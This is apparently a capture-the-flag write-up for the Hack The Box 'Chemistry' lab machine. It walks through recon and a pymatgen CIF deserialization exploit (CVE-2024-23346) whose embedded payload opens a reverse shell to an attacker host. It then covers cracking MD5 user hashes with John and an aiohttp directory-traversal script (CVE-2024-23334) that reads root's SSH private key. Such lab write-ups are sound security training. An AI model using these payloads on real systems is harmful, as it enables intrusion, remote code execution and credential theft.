Recon

Nmap

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_  256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.9.5
|     Date: Sun, 20 Oct 2024 08:04:45 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 719
|     Vary: Cookie
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Chemistry - Home</title>
|     <link rel="stylesheet" href="/static/styles.css">
|     </head>
|     <body>
|     <div class="container">
|     class="title">Chemistry CIF Analyzer</h1>
|     <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
|     <div class="buttons">
|     <center><a href="/login" class="btn">Login</a>
|     href="/register" class="btn">Register</a></center>
|     </div>
|     </div>
|     </body>
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>

Werkzeug Web Server (Port 5000):

  • The Python-based web server suggests a custom or lightweight web application, in this case, a "Chemistry CIF Analyzer."
  • Potential vectors include analyzing how it handles file uploads (CIF file).

Port 5000 | CIF

A CIF (Crystallographic Information File) is a standard text file format used in crystallography to store and exchange crystallographic data. This format organizes information primarily about crystal structures such as atomic coordinates, cell dimensions, symmetry operations, and other details related to the material's three-dimensional atomic arrangement.

  • Structure: CIF files are structured in a way that they can be easily read both by humans and machines. The format is tag-based, similar to XML or JSON, with specific data items identified by unique tags.
  • Data Types: They can include a wide range of data, from chemical composition and crystal symmetry to detailed atomic coordinates and temperature factors.
  • Extensibility: The format is extensible, allowing for the inclusion of new data items as crystallography evolves.

The process might seem a bit intricate, but let's perform a test first. Head over to the Crystallography Open Database and select a CIF file for download. Once we've got the file, create a new account on the server, then upload it. This will allow us to test how the server handles CIF uploads, potentially revealing critical insights into its processing flow:

Upon uploading the CIF file, the server returns a 404 error, but interestingly, it reveals the path /structure for handling uploaded files:

Additionally, the website offers a sample CIF file at address http://chemistry.htb:5000/static/example.cif:

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

Which can be successfully parsed by the server:

The web server itself is running Werkzeug 3.0.3 with Python 3.9.5, an outdated version known to have potential vulnerabilities. This setup could provide an attack surface for further exploration, particularly in the way the server parses and handles CIF files:

Deserialization | Web

CVE-2024-23346

Depends on the information we got in reconnaissance, we know that the server is parsing CIF data under the /structure path, and running an old version of python3.9.5 which may serves some obsolete and vulnerable libraries.

When we uploaded the example CIF to the server, and was successfully parsed, we can observe that:

  • The lattice parameters and atomic site data (positions of atoms in above crystal structure) resemble the kind of structured output that pymatgen could generate from a CIF file. If the file upload parses these parameters from a CIF file and presents them in this format, it suggests that a crystallographic library like pymatgen is being used.
  • pymatgen would extract lattice parameters (a, b, c, α, β, γ), atomic coordinates (x, y, z), and chemical formula (H1 O1), just as shown in the response.
  • The atomic sites (positions x, y, z for each atom) for atoms labeled H and O. This is exactly the kind of output that pymatgen produces after parsing a CIF file. It extracts these details and allows for easy presentation in web applications.

The web server is running Werkzeug 3.0.3 on Python 3.9.5, which is a suitable setup for leveraging pymatgen, a powerful Python library for parsing CIF files. However, the outdated server configuration might introduce some potential risks.

Specifically, CVE-2024-23346 could be relevant here, as it impacts older versions of Python servers. This gives us a strategic opportunity to investigate further, potentially exploiting weaknesses within the server's parsing mechanisms. This article introduces Arbitrary Code Execution in Pymatgen via Insecure Deserialization.

Pymatgen

The CIF (Crystallographic Information File) format is highly relevant when working with pymatgen (Python Materials Genomics), a robust library in Python used for materials analysis.

Integration of CIF files with pymatgen:

  1. Structure Loading and Manipulation: pymatgen can read CIF files to load crystallographic structures into Python objects. It allows researchers and developers to manipulate these structures programmatically.
  2. Materials Property Calculation: Once the structure is loaded from a CIF file, pymatgen can be used to calculate a wide range of materials properties, such as electronic band structure, density of states, and dynamic stability.
  3. Materials Analysis: pymatgen includes modules for analyzing crystal symmetry, exploring phase diagrams, and generating pourbaix diagrams.
  4. Visualization: Through integration with visualization libraries, pymatgen can be used to generate visual representations of the structures loaded from CIF files. This is helpful a more intuitive understanding of complex crystal structures.
  5. Automation in Materials Discovery: pymatgen plays a crucial role in high-throughput materials discovery workflows. It can automate the generation of inputs for simulations, manage computational jobs, and analyze outputs.

To better understand how the server operates, let's look at an example that shows how it uses the pymatgen library:

from pymatgen.io.cif import CifParser

# Load a CIF file
parser = CifParser("<path>/<CIF>")
structure = parser.get_structures()[0]

# Print the structure summary
print(structure)

# Calculate and print the space group
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
space_group_analyzer = SpacegroupAnalyzer(structure)
print("Space group:", space_group_analyzer.get_space_group_symbol())

The server loads a crystal structure from a CIF file, extracts key details, and identifies its space group using pymatgen's built-in functionality.

Given the potential vulnerabilities, especially with older configurations, it's worth noting that installing a version of pymatgen prior to 2024.2.8 aligns with the proof of concept (PoC) and might allow us to explore possible weaknesses in the system further:

To test the Python script with real-world data, we can replace the file path and CIF file name to reflect the actual file we downloaded from the web app:

It extracts and displays the crystal structure details, allowing us to validate the behavior of the server when it parses the CIF file.

Exploit

Original POC from the CVE:

data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in
().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" +
"classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch
pwned");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

Our target server will return a 404 error, similar to what we observed when uploading a random CIF file earlier. This happens because the data structure is NOT recognized by the pymatgen library on the backend.

To bypass this, we need to provide a valid Crystallographic data structure and embed our malicious deserialization payload within it. Since the Crystallographic data structure is extensible, we can modify the example.cif file to include a reverse shell payload:

# example.cif
data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy


 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

# payload
_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.▒▒.▒▒/4444 0>&1\'");0,0,0'
_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

It no longer returns 404, but 500 (Internal Server Error). Set up listener in advance, and we have a reverse shell for the app account:

Crack Hash | Rosa

Our next target will be user rosa:

The web root often reveals sensitive information, such as configuration or database files. In this case, under the path /home/app/instance/, we find a database.db file:

Download the file to our attack machine and dump it, we have the hashes for all registered users:

And we know these are MD5 hashes:

We can use John to crack them easily. Save the hashes into a TXT file:

admin:2861debaf8d99436a10e▒▒▒▒▒▒▒▒▒▒▒▒
app:197865e46b878d9e74a0▒▒▒▒▒▒▒▒▒▒▒▒
rosa:63ed86ee9f624c7b14f1▒▒▒▒▒▒▒▒▒▒▒▒
robert:02fcf7cfc10adc37959▒▒▒▒▒▒▒▒▒▒▒▒
jobert:3dec299e06f7ed187b▒▒▒▒▒▒▒▒▒▒▒▒
carlos:9ad48828b0955513f7▒▒▒▒▒▒▒▒▒▒▒▒
peter:6845c17d298d95aa942▒▒▒▒▒▒▒▒▒▒▒▒
victoria:c3601ad2286a4293868▒▒▒▒▒▒▒▒▒▒▒▒
tania:a4aa55e816205dc0389591▒▒▒▒▒▒▒▒▒▒▒▒
eusebio:6cad48078d0241cca9a7b3▒▒▒▒▒▒▒▒▒▒▒▒
gelacia:4af70c80b68267012ecd▒▒▒▒▒▒▒▒▒▒▒▒
fabian:4e5d71f53fdd2eabdba▒▒▒▒▒▒▒▒▒▒▒▒
axel:9347f9724ca083b17e395▒▒▒▒▒▒▒▒▒▒▒▒
kristel:6896ba7b11a62cacf▒▒▒▒▒▒▒▒▒▒▒▒

Then run John:

john hashes.txt --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt

Roast the hashes, we've successfully cracked the plain-text password for our target user rosa:

Reuse the password for SSH login, we compromise the rosa account, and take the user flag:

Aiohttp | Root

Enumerate the machine with Linpeas, we can take a look at the current processes:

And netstat ports:

The target is straightforward: there's an active, suspicious port 8080 running. Set up port forwarding and check the service.

ssh -L 1337:127.0.0.1:8080 [email protected]

Once tunneled, visit the port in our browser to find a monitoring service:

Observe the network traffic in BurpSuite:

Server Python/3.9 aiohttp/3.9.1 indicates that the service is built using aiohttp, a Python asynchronous framework commonly used for building web applications and APIs.

aiohttp is a popular asynchronous HTTP client-server framework in Python that is designed to handle asynchronous requests efficiently, making it suitable for building scalable web applications, APIs, and services that require high concurrency. It is often used to create non-blocking, event-driven applications where tasks such as network communication, database queries, or file operations can be handled concurrently without waiting for each task to finish before starting the next.

As the exploit in pytmatgen library, this is also an old-version python server, which is subjected to CVE-2024-23334, with a POC found on Github.

CVE-2024-23334 is a directory traversal vulnerability in versions of the aiohttp library up to 3.9.1. The vulnerability occurs when aiohttp is used to serve static files, and the follow_symlinks option is set to True. This configuration allows attackers to bypass the static root directory and access arbitrary files on the server's filesystem, potentially exposing sensitive information.

The PoC on GitHub is purely for demonstration, meaning we don't need to set up the server on our attack machine—the target server handles that. Let's take a look at the exploit.sh script:

#!/bin/bash

url="http://localhost:8081"
string="../"
payload="/static/"
file="etc/passwd" # without the first /

for ((i=0; i<15; i++)); do
    payload+="$string"
    echo "[+] Testing with $payload$file"
    status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
    echo -e "\tStatus code --> $status_code"
    
    if [[ $status_code -eq 200 ]]; then
        curl -s --path-as-is "$url$payload$file"
        break
    fi
done
  • payload="/static/": This is the starting point for the payload, indicating the script begins the traversal at the /static/ directory, which is often used to serve static content.
  • file="etc/passwd": This is the target file for leaking.
  • The loop attempts up to 15 levels of directory traversal (adding ../ to the payload each time) to move up in the file structure from the /static/ directory.
  • curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file": This command makes an HTTP request to the server using the curl tool. The --path-as-is option allows sending the raw path (which includes ../ for directory traversal) without curl URL-encoding it.

In our attack scenario, port 8080 is serving, and our target file could be something like /root/.ssh/id_rsa. The static directory /assets was revealed through network traffic analysis. Now, we can proceed by modifying the exploit.sh script:

#!/bin/bash

url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/.ssh/id_rsa"  # without the leading /

for ((i=0; i<15; i++)); do
    payload+="$string"
    echo "[+] Testing with $payload$file"
    status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
    echo -e "\tStatus code --> $status_code"
    
    if [[ $status_code -eq 200 ]]; then
        echo "[+] File found, downloading contents..."
        curl -s --path-as-is "$url$payload$file"
        break
    fi
done

Bingo:

Use the private key to SSH login as root user:

Rooted.


if (B1N4RY) return 1; else return (HACK3R = 0xdeadc0de);